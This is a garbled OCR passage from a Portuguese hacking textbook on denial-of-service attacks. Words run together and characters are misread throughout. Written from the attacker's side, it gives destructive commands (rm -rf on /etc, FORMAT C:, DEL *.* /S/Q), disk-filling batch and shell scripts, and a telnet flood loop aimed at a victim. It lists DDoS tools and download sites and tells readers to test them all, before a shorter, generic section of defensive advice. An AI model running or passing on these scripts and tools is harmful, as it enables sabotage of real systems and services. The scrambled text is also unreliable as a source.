200.230.xxx.yyy.Lápodehaverumsitefalsoouumsnifferquegraveasinforma-
çõespassadaseredirecioneotráfegoaositeverdadeiro.
OutraformadedesviarotráfegobastanteempregadafazusodoNetcat
-
umaferramentapoderosíssimaepresenteemtodososUnixenoWindows.
12971
1Ataque,defesaecontra-ataque:Invasão

IUniversidadeH4CK3R I
VeremososdiversosusosdoNetcatnopróximocapítulo.
Umaúltimadica:háumexcelentedocumentoempacketstorm.linux
security.com/new-exploits/ssh-insertion-attack.txtquediscorresobrecaptura
desessõesusandooprotocoloSecureShellouSSH.OSSHé,grossomodo,um
primodoTelnetcujaconexãoétodacriptografada.Bem,essedocumentoensi-
naa"meter-se"nessaconexãoquemuitosconsideramsegura.
Negaçãodeserviço(DeniaL ofService)
Nemsemprequeremosobteracessoaalgumsistema.Muitasvezes,porvingan-
ça,terrorismoousimplesdepredação,queremosapenasderrubarumsite,sistema
ouredeecausaromáximopossíveldeprejuízosàvítima.Talprocedimentoé
chamadoatualmentedeNegaçãodeServiçoporqueoresultadoé,viaderegra,a
indisponibilidadetemporáriaoupermanentedoserviçoqueestamosatacando.
OutrasvezesumDenialofService(ouDoS,comoénormalmentechamado)é
necessáriocomopartedeumataquemaior,comovimosemnossosprocedi-
mentosdespoofingnestemesmocapítulo.Deumaformaoudeoutra,um
ataquedotipoDoSéocibercrimemaisdeselegantequesepodecometer

como"partirparaaignorância",comodiziamosantigos.Sementraremdeta-
lhessobreasconseqüênciasmercadológicas,políticasefinanceirasdeumata-
queDoSbem-sucedido,podemosconsiderá-Iotãomortalquantomoralmente
baixo,damesmaformaqueumabrigaderuaoé.
Paraentenderanegaçãodeserviço,imaginequalquersistemaconectadoà
Internetquesequeiraderrubarcomosendoumserviço"nomundoreal";flo-
ricultura,pizzaria,polícia,defesacivil,etc...Imagine,porexemplo,quevocê
queiracolocarfogoemumprédiopúblicoetercertezadequenãoteráseus
planosarruinadosporalgumbombeirocomvocaçãoparaherói.Umadasma-
neirasdeimpedirqueosbombeirosentrememaçãoéimpedirqueelessaibam
queoprédioestáemchamas.Paratal,bastamantertodasaslinhasdo193
congestionadascomtrotes.Emergênciaslegítimasnuncaserãoatendidas.
Aindanoâmbitotelefônico,umbeloexemplodenegaçãodeserviçopôdeser
vistonoftlmeDurodeMatar3:oterroristainterpretadoporJeremyIrons
colocouumabombaemalgumaescolaprimáriadomunicípiodeNovaYork.
Alémdenãoinformaràpolíciaemqualescolaoaparatoestavainstalado,o
bandidoaindadivulgouapresençadabombaparaamídia.Resultado:apopu-
laçãointeiradacidadecomeçoualigarparaosnúmerosdapolícia,congestio-
nandoaslinhaseimpedindoospoliciaisdetrabalhar.
Negaçãodeserviçolocal
HádiversosníveisdeDoS.Osmaisbásicossãooscausadosporpessoascomacesso
físicoaosistema -emoutraspalavras,literalmente"meteramarreta"noequipamento.
Passarcomocaminhãoporcimadalombadaeletrônicaparatirá-Iadeserviço(elivrar-
sedamulta)tambémpodeserconsideradoumtipodenegaçãodeserviço.
1298I
Ataque,defesaecontra-ataque:Invasão[

Universidade3°ano
UmDoSdenívelumpoucomaisalto(nãomaisnasarjeta,masaindamendi-
gandonacalçada)seriaoacessológicoaossistemas.Usuárioscomcontasou
invasoresqueconseguiramacessolimitadopodemtentardestruirosistema
comcomandosnocivos.Hádiversasmaneirasdefazerisso.
~Apagamentooudestruição:umusuáriocomumacontaemumservidor
Solarispoderiatentarumrm-Rf.emumdiretóriosensível-oletc,porexem-
plo.CasooambientesejaWindows,nadamaisfácilqueumFORMATC:ouum
DEi*.*IS/Q.
~Consumoderecursos:mesmousuárioscomacessomuitorestritode-
vempoderrodarprogramasnosistema-comotrabalharãosemeles?Isso
posto,épossívelcriarprogramasespecialmentetalhadosparaaumentarem
progressãogeométricaoconsumoderecursosdamáquina-sejapormúlti-
plosacessosadisco,inundaçãodasinterfacesderedecomtráfegoespúrio,
multiplicaçãoindeftnidadeprocessosoumesmogravaçãoininterruptade
dadosemarquivosatépreenchertodooespaçodisponível.
~Vulnerabllidadeslocais:umbufferoverflow,sebem-feito,podelevara
acessoirrestritoouàexecuçãodecomandosarbitráriosnosistemavulnerável.
Umataquemal-feito,entretanto,podeapenastravaroprograma.Seoprogra-
maforvitalparaosistema(comopartesexpostasdokernelemumWindows
N1)ouoferecerumserviçoaosusuáriosexternos(comooX-Windowouo
SendmailemumUnix),oestragoserámaior.Casoolixojogadonapilhaseja
emquantidaderealmentegrande,épossívelqueosistematodocaia.
~Acessoirrestrito:usuárioscomacessoprivilegiado(porexemplo,um
administradorderedeinsatisfeitocomseusalário)podemfazerdiversas
"malvadezas"comoreconftgurarserviçosoumatarprocessosimportantes,além
deplantarcavalosdetróia,bombasdetempoediversostiposdevírus.
HádiversasferramentasnaInternetqueseprestamaessepapel,emesmo
script-kiddiescomumpoucomaisdetutanopodemcriarferramentassimples
paratal.Querumexemplo?EmumamáquinaWindows,crieumarquivo
DADOS.BATe,dentrodele,coloque:
@ECHOOFF
ECHOUHackerU >DADOS.DAT
:VOLTA
TYPEDADOS.DAT»SYSTEM.DAT
TYPESYSTEM.DAT»DADOS.DAT
GOTOVOLTA:
12991
]Ataque,defesaecontra-ataque:Invasão

IUniversidadeH4CK3RI
RodeoprogramaDADOS.BATevocêveráosarquivosDADOS.DATe
SYSTEM.DATcresceremindefinidamente.EmumshellUnixétãosimplesquanto.
Experimenteoseguintescript(chame-odedados.sh):
#/bin/sh
touchdados.dat
touchsystern.dat
echollhackerll»dados.dat;
while[1=1];
do
catdados.dat »systern.dat;
catsystern.dat»dados.dat;
done;
Executeoprograminha(dados.batnoWindows,shdados.shnoUnix)e
vejaoqueacontece.Aparentementenada,massevocêderumlsnoUnixoudir
noDOSparalistarosarquivos(emoutroshellououtrajaneladoDOS)verá
queotamanhodeDADOS.DATeSYSTEM.DATcrescemexponencialmenteà
medidaqueotempopassa.Rodandoporapenasumminuto(60segundos
exatos)ostamanhosficarãodaordemde100MBcada.Maisdezminutose
teríamosdoisarquivosde1GBcada,em60minutos(umamíserahora)tería-
mos12GBocupados.OsprogramasemDOSeUnixapresentaramdesempe-
nhosemelhantequandoexecutadosnomesmohardware.
Observequenenhumdos2scriptsprecisoudeprivilégiosespeciaispara
rodar:foramexecutadosdiretamentenaáreaautorizadaparaousuárioeusa-
ramferramentaserecursosdisponíveisnosistema
-nadaprecisouserinstala-
do.Observeaindaqueosquatroproblemaslistados-apagamentooudestrui-
ção,consumoderecursos,vulnerabilidadeslocaisealteraçõesporacesso
irrestritopodemmuitobemserimplementadasnosV1fUSquechegamavocê
pelaInternetepordisqueteseCDsinfectados!!!Defato,osV1fUSdecomputa-
dor,desdequesurgiramnoiníciodosanos80,sãoumexemploclássicode
negaçãodeserviçolocal!
Mastudoissoédemuitíssimobaixonível.Sealgumsistemacomputacional
estáàmercêdeoperáriosbraçaismunidosdemarretasepicaretasalguém
deveperderoemprego-provavelmenteosegurançadaportariaeoCEOda
empresa...Entretanto,háalgunstiposdeataquesorquestradosexternamente
-emoutrapartedaredeinternadaempresaoumesmoviaInternet.
Negaçãodeserviçoremoto
Alémdoanônimatoinerenteaosataquesremotos,háumainftnidadedemé-
todoseferramentasquepermitemqueumataqueremototipoDoSsejades-
300I
Ataque,defesaecontra-ataque:Invasão[

Universidade3°ano
truidor.VamosnosatermaisàteoriasobreDoSeindicaralgumasferramentas
paralevartaisataquesabomtermo.Mascomoé,delonge,amodalidadede
ataquemaispopular,documentadaecomentadadaInternet,deixaremosao
leitoratarefadebuscarmaisinformaçõesarespeito.
Hádois"subtipos"deataquesDoSremotos.Algunsdelesatacam
vulnerabilidadesconhecidasnossistemas-alvo-comoasfalhasdeRPCque
resultaramnaquedadenovedos13roteadores-raizdaInternet(todosnos
EUA)emoutubrode2002.OoutrograndegrupodeDoSremotoprocura
exaurirtodososrecursosdoalvo-sejaocupaçãodebandadarede,multipli-
caçãodescontroladadeprocessosnoservidorHTTPouinundaçãodemensa-
gensdee-mail-possivelmenteacompanhadasdevíruspotencializadoresdo
ataque,comooKlezeoBugBear.OfamosoeanciãoPingofDeath-tipode
ataqueusandooutilitárioPingparagerarpacotesICMPdefeituososegigan-
tescos-pertenciaaambosostipos:geravaumafragmentaçãodefeituosa
dospacoteseaomesmotempoconsumiabanda.
UmexemplodeferramentadeDoSremotodoprimeirotipoéoveterano
WinNuke.OprogramaaproveitavaumafalhaexistentenoWindows95eno
WindowsNT3.51:casoaporta139-nossavelhaconhecidado
compartilhamentodearquivosemredesMicrosoft-recebessepacotesnão
válidosemlugardoprotocolo5MB,osistemaoperacionaltravava.Háver-
sõesatuaisdoWinNukequeexploramoutrasvulnerabilidades
-umavez
queessafoiconsertadanoWindows98enoNT4 -etrabalhamtambémcom
exaustãoderecursos.
Parasabermaissobreessetipodeferramentas,procureporDoSou
malformedpacketdosattackemseumecanismodebusca.Inúmerasferra-
mentasparaesseeoutrostiposdeataquepodemserencontradasem
packetstormsecurity.nl/DoS/eemwww.astalavista.box.sk.
Járecaindonosegundotipo,otipomaiscomumdeataqueéoSYNFloodou
inundaçãodepacotesTCPSYN.Lembra-sedenossaprimeiratentativadespoofing?
EnfiávamosumSYNcomIPdeorigemdiferentedonosso.Naquelasituação,não
conseguíamosestabelecerumaconexãospoofadapordoismotivos:
1.ComoamáquinaatacadanãosabianossoIPverdadeiro,nãopoderia
responder-nos;
2.AmáquinapelaqualnosfazíamospassarretornavapacotesTCPRSTe
acabavacomnossaconexão-ecomnossaalegria...
NocasodeumDoSporSYNFlood,dequenosimportaseseremosrespondi-
dosounão?OquevaleéenviarmostantosTCPSYNSpoofadosquantopossí-
vel,paraqueamáquina-alvoseocupederespondê-Iosenãotenhatempode
responderaoutrasrequisiçõesdeoutraspessoas.Lembre-se:avítimavaienvi-
arumSYN-ACKeesperarporACKsquenuncavirão.Issoacabaráporimpos-
sibilitaravítimaderesponderaqualqueroutropedidodeconexãooumesmo
atenderaconexõesjáexistentes.
1301I
1Ataque,defesaecontra-ataque:Invasão

IUniversidadeH4CK3R I
ObviamenteháoutrosmétodosparaDoSalémdoSYNFlood.Umoutromé-
todomuitíssimousadofazusodepacotesICMPEchoRequest(ping!)dispara-
dostambémeminundação.SeoIPestiverspoofado,amáquina-alvonãores-
ponderáaoIPdeorigem,masaoIPfalso.UmaextrapolaçãodoDoSutilizando
ICMPéofamosoSmurf:dispara-seICMPEchoRequestparaumgrandenúme-
rodemáquinas,mascolocandocomoendereçoIPdeorigemoIPdavítima(e
nãoumfalso).Oresultadoéumgrandenúmerodemáquinasrefletindoao
mesmotempoumamultidãodepacotesICMPemdireçãoàvítima,quesaido
arpraticamentenomesmoinstante.
~~,
IPx.x.x.2
~
IPdaúltima
..
- 'Socorro!
~-t~~-~ ~
~~
~
OutrapossibilidadeéusarumamensagemUDPemvezdeICMP.Háumserviço
chamadoecho,funcionandonaporta7UDp,quesimplesmentedevolveaoendere-
çodeorigemtudooquechegarporela.Bem,imagineentãoenviarumpacote
UDPspoofado,cujoIPdeorigemé127.0.0.1(ouseja,oloopback-emoutras
palavras,aprópriamáquina)eoIPdedestinoéoIPdamáquina.Emumasituação
dessas,opacoteUDPentraemloopdentrodamáquina.Umnúmeropequeno
dessespacotesbastaparacomprometertodaapilhaTCP!IPdosistemaoperacional
econsumirgrandespercentagensdabandaderededisponível.Extrapolandoda
mesmaformacomonoataqueSmurf,pode-seenviarparaaportaUDP7deinúme-
rasmáquinaspacotescom
IPdeorigemigualaodaví-
tima.Todaselasdevolverão
opresenteparaamáquina
sobataque-comprome-
tendoabandanovamente.
Seohackerusarbroadcast,
então,oqueeraumaleve
malvadezapassaaseruma
calamidade.Talataqueé
chamadodeFraggle.
Origem:127.0.0.1
.
Destino:IPdaVítima
PortaVOP7
3021
Ataque,defesaecontra-ataque:Invasãor

Universidade3°ano
Alémdessesmétodosquetiramamáquinadoar,háoutrostiposbemmais
sutis,emesmoalgunsinusitados.Porexemplo,lembra-sedenossosprogramas
debruteforce?Algunssistemas,paraevitarjustamentesereminvadidospor
bruteforce,limitamonúmerodeloginspermitidos(onúmerovaria,masa
quantidadeusualétrês).Bem,umprogramadebruteforcepodeserusado,
então,parabloquearsistematicamentetodasascontasdosistema,impedindo
quequalquerusuário-selogue.Trêsacessosemcadacontasãosuficientes,o
quetomaaoperaçãoextremamenterápidaeeficaz.
Pode-setambémmultiplicarconexõesaumserviçoespecíficoatéquetodos
osrecursosdoservidoremquestãosejamconsumidos-sejanaformadepro-
cessosabertos,sejapormeiodeesgotamentodebanda.Porexemplo,sequere-
mosderrubarumcomputadorcujoservidordeTelnetestejaligado,bastaro-
darmosumscriptcomoesteemnossamáquinaUnix:
while[1=1];
do
telnetip.da.vítima.aqui &
done;
ÉpossívelfazeromesmonoWindowscomumpoucomaisdetrabalho.
Troquetelnetpelolynxevocêtemumaferramentaparacausaromesmo
estragoemservidoresHTfP.TroquepelocomandomaUevocêpoderáencher
oservidorSMTp'etc.Háaindaapossibilidadedefazeromesmocomping,
RedesMicrosoft,SSH,FTP(servidoresFTPdoNovellNetwaresãoespecial-
menteapetitosos...),Usenet,Finger,MS-SQL,MS-Access,ICQ...Achoquevocêjá
"pescou"aidéia.
Apesardosataquesacimadescritospoderemserfeitosmanualmentepor
hackersdeverdade,existemalgumasferramentasquefacilitameautomatizam
essetiposdeataque-eoslammersasadoram.Taisferramentaspodemser
encontradasaosmontesnosmesmoslugaresanteriormentecitados:
packetstormsecurity.nl/DoS/eemwww.astalavista.box.sk.Noendereço
www.astalavista.com/library/ddoslbasics/intro.shtmlháumtutorialinteres-
sante(eminglês)sobrediversostiposdepequenosataquesdeDoSlocale
remotoquepodemsertentados.Estudetodoseles,procurandonaInternet
exemploseinformaçõesadicionaissobrecadaum.
MasháalgomuitomaismalvadoqueDoSsimples:osataquespornegaçãode
serviçoremotodistribuído,ouDDoS.
NegaçãodeServiçoRemotoDistribuído
OsataquesSmurfeFragglejásãomaneirasefetivasdeampliarataquesorigi-
nadosemumúnicoponto-porissomesmosãochamadosde"lentesdeau-
mento".Entretanto,mesmoseutilizandodessalente,abandaderededisponí-
velparaoatacanteélimitada,eelenãopodemanterumataquecommuitos
I303I
1Ataque,defesaecontra-ataque:Invasão

IUniversidadeH4CK3R I
pacotesparacadamáquinaamplificadoraemanter,aomesmotempo,muitas
máquinasamplificadorasenviandoessesmesmospacotesàvítima.
Pararesolveraparada,foidesenvolvidoumcertotipodeataqueemqueos
pacotesdestinadosàsvítimasnãosaemdamáquinadohacker,masdecompu-
tadoreszumbiscontroladosremotamenteporele.Nessescomputadores,o
hackerinstalacertostiposdecavalodetróiaouvtrUsquerespondemacoman-
dosexternosefuncionamcomofontegeradoradoataquesãooschamados
agentesouzu.m.bis.O"contágio"dá-sepelosmesmíssimosmétodosjáestuda-
dosatéaqui-invasão,distribuiçãocamufladaemesmocooperação.Oatacan-
tepossuiumoumaisprogramasmestre,quecontrolamosagentes.
Lembra-sedequandodissemosqueainvasãodesistemasmenorespoderia
serusadocomotrampolimparachegaràvítimaprincipal?Poisbem,estaé
umadassituações.Oatacantelevasemanas,àsvezesmeses,parainvadirpe-
quenossistemas-
computadorespesso-
aiseservidoresdepe-
quenasempresas-
semqueseuinteresse
imediatosejataismá-
quinas.Elasserãousa-
das,issosim,como
zumbisnumataquea
grandescompanhias
(123412341234...),e
paraissoénecessário
queossoftwaresade-
quadosestejaminsta-
ladosnelas.Ohacker
pode,inclusive,con-
sertaralgumascoisas
eatéatualizaramá-
quinadoindivíduo,
casoissosejanecessá-
rioparaqueoataque
principalsejalevadoa
termo.
Umavezinstaladoos
agentes,ohackerpode
iniciarumataqueapar-
tirdomestre:
3041
Ataque.defesaecontra-ataque:Invasão [
"Salvem-me!"

Universidade3°ano
Imagineagoraqueohackerémaistarimbado.UmataqueDDoSpodeser
sofisticadocomadistribuiçãodediversosmestres,controladostambémà
distânciapeloinvasor.Elepodetantousarferramentasespeciaisparatal,já
existentes,comotambémusarcoisasdosistemaoperacionalcomooNetcat
ouoTelnet.
"Salvem-me!"
1305 I
]Ataque,defesaecontra-ataque:Invasão

IUniversidadeH4CK3R I
Agora,umapitadaamaisdemaldade:cadaumdosagentespodeusarlentes
SmurfouFraggleparamultiplicarsuaforça.Umataquecomessaconfigura-
çãoédevastador!
13061
Ataque,defesaecontra-ataque:Invasão[

Unive.rsidade3°ano
MastersandSlaves
Háumainfinidadedeferramentasparatodososataques000eDDoSdescri-
tosaquLAmaioriapodeserencontradanosdoissitesindicadosanteriormente:
packetstormsecurity.nl/DoS/ewww.astalavista.box.sk.Outraseção,
packetstormsecurity.nl/distributed/,tratadeferramentasetutoriaisDDoS.
Procure,nossitesindicadoseemseumecanismodebuscapreferido,infor-
maçõesedownloaddasseguintesferramentas:
.Fapi
.Targa
.Blitznet
.TrinOO/WinTrinOO
.TFN/TFN2k/TFNWin
~Stacheldraht
~Shaft
~Trank
~Trinity
Comotarefaparacasa,oestimadoleitorteráqueleradocumentaçãoetes-
tartodos,umaum,edescobriremquaiscategorias(ásvezesmaisdeuma)
cadaumdelesseencaixa.
Outratarefa:procureinformaçõessobreataquesaroteadores.Vocêficará
surpresoemsaberqueporvezesémaisfácilatacarequipamentosintermediá-
riosdaInternetdoqueoalvofmal.Seestámuitodifíciltirardoaroservidor
daquelaempresainimigadomeio-ambiente,talvezoroteadorligadoaeleseja
oladomaisfraco -e,dequebra,deixaaredeinternadelessemacessosà
GrandeRede.
Defesaecontra-ataque
Bem,lávamosnós.Estefoiumcapítulolongo.Procuramoscolocarneleo
básicodobásicosobreataquesacomputadoreseredes.Ustamosaqui,portan-
to,algumasdicassobreoqueprocurareporondecomeçarparasegurarseus
sistemaseevitarquesejamatacadoscomessastécnicas.
Recomendaçõesaplicáveisatodosostiposdeataques
Omaisimportante!Deixeativadosapenasosserviçosqueestárealmente
usando.SeoservidoréapenasdeHTTPeFTp,desabiliteFinger,Telnet,SSH,
SMTP,POp,IMAP,Quake...
ConfigurecorretamenteseufIrewall,etenhasempremaisdeumtipo,pelo
menosumdiferenteparacadaladodaDMZ.Prefiraf1ltrosdepacoteporesta-
dodeconexão(StatefulPacketFilters)efIrewallsdotipoProxy.Mesmocom
osserviçosdesabilitadosnosservidores,fecheasportascorrespondentesno
13071
1Ataque,defesaecontra-ataque:Invasão

IUniversidadeH4CK3R I
firewallparaevitartráfegofantasma(porexemplo,debackdoors)eACK
Scanning.Nãotenhapreguiça:façaumatabeladeregrasdeftltragemrealmen-
telongaeabrangente,preferencialmenteassociandoportaseendereçosenão
simplesmentebloqueando.
Mantenhasempreseussistemasatualizadosparaevitarserinvadidopor
vulnerabilidadesconhecidasebemdocumentadas.Atençãoespecialaoshotfixes
eServicePacksdaMicrosoft-oquenãoquerdizerqueseussistemasUnixe
Novellprecisamdemenoscuidado.
Porpadrão,crieusuárioscomonúnimopossíveldeprivilégioseváaumen-
tando-osàmedidaquesejapreciso.Casoousuárionãoprecisemaisdoprivilé-
gio,nãohesiteemcassá-Io.Criepolíticasseveraseconsistentesdecontas,que
incluamnomesdeloginnão-óbvios,gerenciamentoostensivodecontasativas,
desativaçãoimediata(ouantes,cancelamento)decontasociosas,senhasfortes
contendoletras,númerosesímboloseregrasparaalteraçãodesenhasem
menosde30dias.Alémdisso,umdocumentointernooficial,assinadopelo
funcionário,deveregularclaramenteosequipamentosautorizadosaconectar
àredeepreverpuniçõescasoaredesejainvadidaoucomprometidapormau
usooudescuidodousuário.
WarDiaLingeBruteForce
Emprimeirolugar,tenteatacarasimesmocomferramentasdeforçabruta.
Sevocênãodeveriapossuirmodemsouacessospessoaisdealtavelocidade
ligadosàsuarede,estaéumaboamaneiradedescobrir.Aomenorsinalde
modemdiscado,cablemodemouaDSLnãoautorizadosemseusistema,remo-
va-osimediatamente!
ParasistemasacessíveisporInternetouporconexãoviaterminal,arecomendação
énãodaracessoatodasascontaspordefault.Ecuidadocomascontaspadrãodo
sistema!Obrigatoriamente,osacessosdeverãoserfeitosporVPNscriptografadas.
Nocasodeseunegócioouinstituiçãorealmentenecessitardemodemse
loginsexternosviaInternetouSSH,apolíticadesenhaseacessodaempresa
deveserseguidaàrisca,easpenalidadesaplicadasdeformaexemplar.
Estourodepilha
Nãohámuitooquedizeralémdoóbvio:sevocêéprogramador,suaobriga-
çãoéescrevercódigoimuneabufferoverflow.Mesmosendoinerenteàslin-
guagensdeprogramação,épossívelimplementarrotinasdeverificaçãoque
barraminjeçãomaliciosadedados.
Sevocêéadministradordesistemasoumesmousuáriodoméstico,mantenha
seusistemasempreatualizadocomosúltimos"remendos"publicadospelos
fabricantesdeseusoftware.Enãoseconcentreapenasnosservidores:asesta-
çõestambémsãovulneráveiseportasdeentradaparasuarede.
13081
Ataque,defesaecontra-ataque:Invasão[

Universidade3°ano
Quebradesenhas
Paracomeçar,useferramentasdequebradesenhaemvocêmesmo.Sótermine
quandoestiversatisfeitocomoresultado-quedeveser,poracaso,zero:nenhuma
senhaadescoberto.Façaessetesteperiodicamente,pelomenoscomodobroda
freqüênciacomaqualassenhasdevemsermudadas.Seapolíticadaempresaobriga
osusuáriosamudarasenhaacada30dias,tentequebrarassenhasdosistemapelo
menosacada15dias.
Ométodomaiseficienteparabarrarobroteforceélimitandoonúmerodelogins
ebloqueandotemporariamente(enãoemdefinitivo)ascontasdosistema.Issocria
umproblemadeDoS,masaindaémelhorqueterseusdadoscomprometidos.
Eviteoroubodesenhasatodocusto,edificulteaomáximoavidadocrackerque
porventuraconseguí-Io.Valedesabilitaros1MHashesnoWindowsNT/2k,criarum
servidordelogincentralizado,comcriptografiaesegurança(comooKerberos),usar
ShadowPasswordsnoUnix(tambémcomlogincentralizadoviaLDAP+Kerberos)e
mesmocriptografarossistemasdearquivos.
Asseveraspolíticasdesenhasdescritasacimatambémseaplicamnestecaso.Bem
comocampanhasdeconsientizaçãodosusuáriosparaosmalesdassenhasfracase
docomportamentoderisco-senhasnãodevemserescritasemlugaralgum,muito
menosdivulgadasoNUNCA!
Porfim,ainstalaçãodesoftwaresquerejeitamsenhasfracasnoatodocadastrodo
usuário(eposteriortrocadesenhaperiódica-suaempresainstituiuisso,nãoé?)é
umponto-chaveparaevitarqueosusuárioscoloquememriscotodaaredepor
colocaronomedocachorrocomosenhapessoal.
WarDriving
CriptografesuaredeeativeoWEP.Pontofmal.
SQlInjectionseCookiePoisoning
Criedispositivosdeverificaçãoemtodos(repito:todos)oscamposdetodos(no-
vamenterepito:todos)osformuláriosdoseusitenaInternet.Bloqueiesumariamen-
tecaracteresperigososcomo=,'e",*,%e_oUmaboapolíticaéliberarapenasletras
enúmerosebloqueartodooresto.
UsesempreométodoPOSTparaenviá-Iosaoscriptprocessador,umavezqueo
métodoGETdeixainformaçõesimportantesnaURL.Sepossível,criptografeoscam-
posantesdeenviá-Ios.Melhorainda:useconexõesHTTPS/SSLcomcertificadosemi-
tidosporempresasidôneasecriptografiaforte.
Nocasodecookies,façaumcontroledesessãocoerente,comsessionIDspreferen-
cialmentecriptografadose,sepossível,dinâmicos-mudandoacadapáginaacessada.
NãosedeveconfiarapenasnacriptografiadoSSL:criptografetudováriasvezes
ANTESdeenviarporHTTPS(quetambémécriptografado).
1309I
]Ataque,defesaecontra-ataque:Invasão

IUniversidadeH4CK3R I
Sniffing,SpoofingeHijacking
Emprimeirolugar,coloquef1ltrosanti-spoofedetectoresdesniffersemto-
dosospontosdeentrada,saídaepassagem(roteadoresentresub-redes)desua
rede.IDSssãobemvindosegrandescompanheirosdessasferramentas.
Mesmonãosendoimpeditivoparaaaçãodohacker,éumagentecomplicador:
instaleswitchesebridgesemvezdehubsesegmentesuaredeaomáximo.
Alémdobenefíciododesempenho,issocriaumacamadaamaisdedificuldade
paraoinvasor.Sepossível,dividaaredeemsubredesecoloqueroteadores
comf1ltrosdepacotesmuitobemestruturadosparainterligá-Ias.Dependendo
donúmerodepessoas,tempo,orçamentoetamanhodarede,épossívelconfi-
gurarestaticamenteastabelasMACdosswitchesebridgesemcadaumade
suasportas.Comisso,oequipamentoficaimuneaARPSpoofmgeMACFlooding .
(masnãoaoentupimentodaredeoumesmoànegaçãodeserviçopossivel-
menteprovocadosporeles).Masprepare-se:éumatarefahercúlea...
Outrométodoparadificultar(emuito!)aaçãodessasferramentaséa
criptografiasistemáticadetodaarede.Todaela.Usetudooqueestiveràmão,
cadaqualparasuafunçãoespecífica:PGP/GPG,IPSec,HTTPs,SSH(usesem-
preSSHversão2!).JáviprojetosdeVPNscomváriosníveisdetunelamento,
todoscriptografados.Leveemcontaofatodequecadanívelcriptográficotem
umimpactonegativofenomenalnodesempenhototaldaredeeuseobom
sensoparadosarperformanceesegurança..
ImplementeDMZsnãosóentrearedecorporativaeaInternet(issoémio-
pia!),mastambémdiversosníveisdeDMZsemesmoDMZsinterdepartamentais!
VerifiqueapredictabilidadedosnúmerosseqüenciaisTCPdeseuscomputa-
dores.MáquinasWindows9xtornamissobrinquedodecriança,máquinas
FreeBSDeSolaris,poroutrolado,sãofamosasporserempraticamente
randômicasnesseponto.
SeestiverusandosistemasUnix,esqueçaosUnixTrusts.Alémdeles,outro
esquemadeconfiançamuitoruiméoqueaMicrosoftchamadePDC/PDC
TrustedRelationsnoWindowsNT.Evite-oscompletamente.Prefirasistemas
modernoscomooNovelleDirectoryouasinúmerasimplementaçõesdoLDAP,
incluindoaíoAOSdaMicrosoft.Masusesempreumesquemadecriptografia.
Senadadissoestiverdisponível,émaissegurodeixarousuáriologar-seindivi-
dualmenteemcadaumdossistemasdaempresadoqueterumsistemade
autenticaçãocentralizadocujoesquemadeconfiançaéfalho.
NegaçãodeServiço
IDSsajudamadetectarataquesDoSlocais-anãoserqueoataquedestruao
próprioIDS,oqueébempossívelemesmoprovável.
AsdefesascontraIPSpoofing,ARPSpoofingeMACFloodingtambémaju-
damaqui.TabelasMACestáticasemswitchesidem.
1310I
Ataque.defesaecontra-ataque:Invasão

Universidade3°ano
Sistemascomaúltimaatualizaçãoliberadapelafabricantesãomenosexpos-
tosaDoSbaseadosemvulnerabilidadesconhecidas.Algunssistemaspossuem
patchesqueostomaminclusiveimunesaataquesdotipoSYNFloodeSmurf.
Sepossível,compremaisvelocidadeparasuaconexãoetenhasemprerotas
alternativas(esecretas!)casoaconexãoprincipalestejainundada.Adequação
detráfego(TrafficShape)tambémédesejável.
ParaoDDoS,umaúnicarecomendação,alémdasanteriores:mantenhaos
zumbislongedesuasmáquinas!Façaumaauditoriaperiódicaemtodosos
computadoresàprocuradeportassuspeitasouprogramasnão-autorizados.
Umaúltimadica:Echolot(echolot.sourceforge.net).
I311I
Ataque,defesaecontra-ataque:Invasão

Ataque,defesae
contra-ataque:
.
Manutencão
.
Capítulo
"Now/'mcomingthroughthebackdoor
Howdid/gethere/00/mind
/naneeriesortofway
/senseyoureaching...
Wil!youlingeralittlelonger
While/wonder'
TadpoLe,"Backdoor"
i.-EntrolivrementeporsuaportadetrásIMascomo
chegueiaela?IAtémeimportoImasdesprezovocéI
Euosintomealcançar...IVocéficaráporaiumpouco
mais?IEuficoaqui-.DosingleBackdoor.dei999.

IUniversidadeH4CK3RI
Ganharacessoaumsistemaqualquer -sejaeleumwebsite,umarede,um
computadorMacintoshouumservidorNovell-nãoébolinho.Emtodosos
capítulospreparatórioseespecialmentenoanterior,vimosalgunsmétodosde
comoprepararoterrenoeganharacessoaosnossoalvos.Nãotodos,nãomui-
tos,sequerosmaisimportantes:afImdeilustrarospassosaseremseguidos,
vimosapenasumououtroexemplo.
Nãotomeestelivro,portanto,comoumaenciclopédiadeataques.Emvez
disso,use-ocomocartilhaparaaprenderobê-a-bá,evápesquisandoeestu-
dandonosrecursosindicadosemtodososcapítulos.Leiturasadicionaissão
muitoimportantes.AsérieHackersExposed(McClure,ScambrayeKurtz,
editoraMakron,zaediçãoemportuguêse4aeminglês),compostadequatro
livros-HackersExposed,HEWindows2kedition,HELinuxeditioneHE
Webedition-éumaexcelentecompanheiraparanossapequenaobraeenfocá
oassuntodemaneiradiferente.Enquantotentamosmostraramecânicada
coisa,asérieHEofereceumverdadeiro"dicionário"deataques.Masnãodes-
cuidedoBugtraq!!!
Umavezdentrodosintestinosdenossapresa,éhoradecuidardemanterseu
acessoe,possivelmente,bloquearacessoaoutroscandidatosainvasorque,
pordescuido,podempôraperderseusmesesdeestudoeesforço.Cuidemos,
então,damanutençãodenossapermanêncianoseiodavítimaporlongosanos.
Backdoors
Todacasapossuiumaportadetrás(ok,ok,algunsapartamentosmaispopula-
res[apertamentos???]possuemapenasumapassagemparaacessoaoimóvel-e
passapelasaladeestar.Fazeroquê...).Pelaportadetrástrazemosafeira,os
empregadosdacasatêmacessoaointeriorparatrabalhar,osoperáriostrazem
ferramentasematerialparareformarobanheiroesaímoscomocachorropara
passear.É,portanto,apropriadamentechamadadeportadeserviço.
Poroutrolado,pelaportadafrenterecebemosnossasvisitas.Seforumimó-
velcomercial,éporelatambémquerecebemosnossosclientes.Adecoração,
osobjetoseopróprioespaçosãodiferentesnosambientesatendidospelas
duasportas.Portanto,éapropriadodizerqueambasasportaspossuemfun-
çõesdiferentes,e,portanto,prestam-seaatividadesdiversas.
Emumsistemacomputacional,muitasvezesénecessáriotambémpossuir
váriasformasdeacesso.Oambienteoperacionalqueosusuárioscomunsco-
nhecemédesenvolvidodemodoatornarautilizaçãodosistemamaisfácile
direta.Poroutrolado,devemhaverformasdeosadministradoresacessaremos
sistemastambéme,assim,desempenharsuastarefas,muitasvezesatésimulta-
neamente,semincomodarousuário.
3141
Ataque,defesaecontra-ataque:Manutenção

Universidade3°ano
Hádiversasmaneirasdechegaraisso.EmsistemasUnix,oadministrador
podesimplesmentelogar-seremotamentecomoroot(viaSSHv2,nuncavia
